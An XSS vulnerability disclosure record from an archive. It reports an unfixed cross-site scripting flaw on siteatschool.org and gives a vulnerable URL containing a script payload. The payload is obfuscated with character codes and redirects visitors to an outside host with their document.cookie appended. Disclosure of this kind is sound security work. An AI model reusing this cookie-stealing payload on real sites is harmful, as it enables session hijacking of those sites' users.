Unfixed XSS vulnerability at siteatschool.org

2007-12-07T00:00:00
ID XSSED:12348
Type xssed
Reporter nights_shadow
Modified 2007-07-26T00:00:00

Description

Security researcher nights_shadow, has submitted on 12/07/2007 a cross-site-scripting (XSS) vulnerability affecting siteatschool.org, which at the time of submission ranked 922912 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 26/07/2007. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail.

Vulnerable URL: http://siteatschool.org/index.php?q=<script>window.location=String.fromCharCode(104,116,116,112,58,47,47,119,119,119,46,103,111,111,103,108,101,46,99,111,109,47,105,110,100,101,120,46,112,104,112,63,99,111,111,107,105,101,61)%2Bdocument.cookie;</script>&r=10&page=31&section=10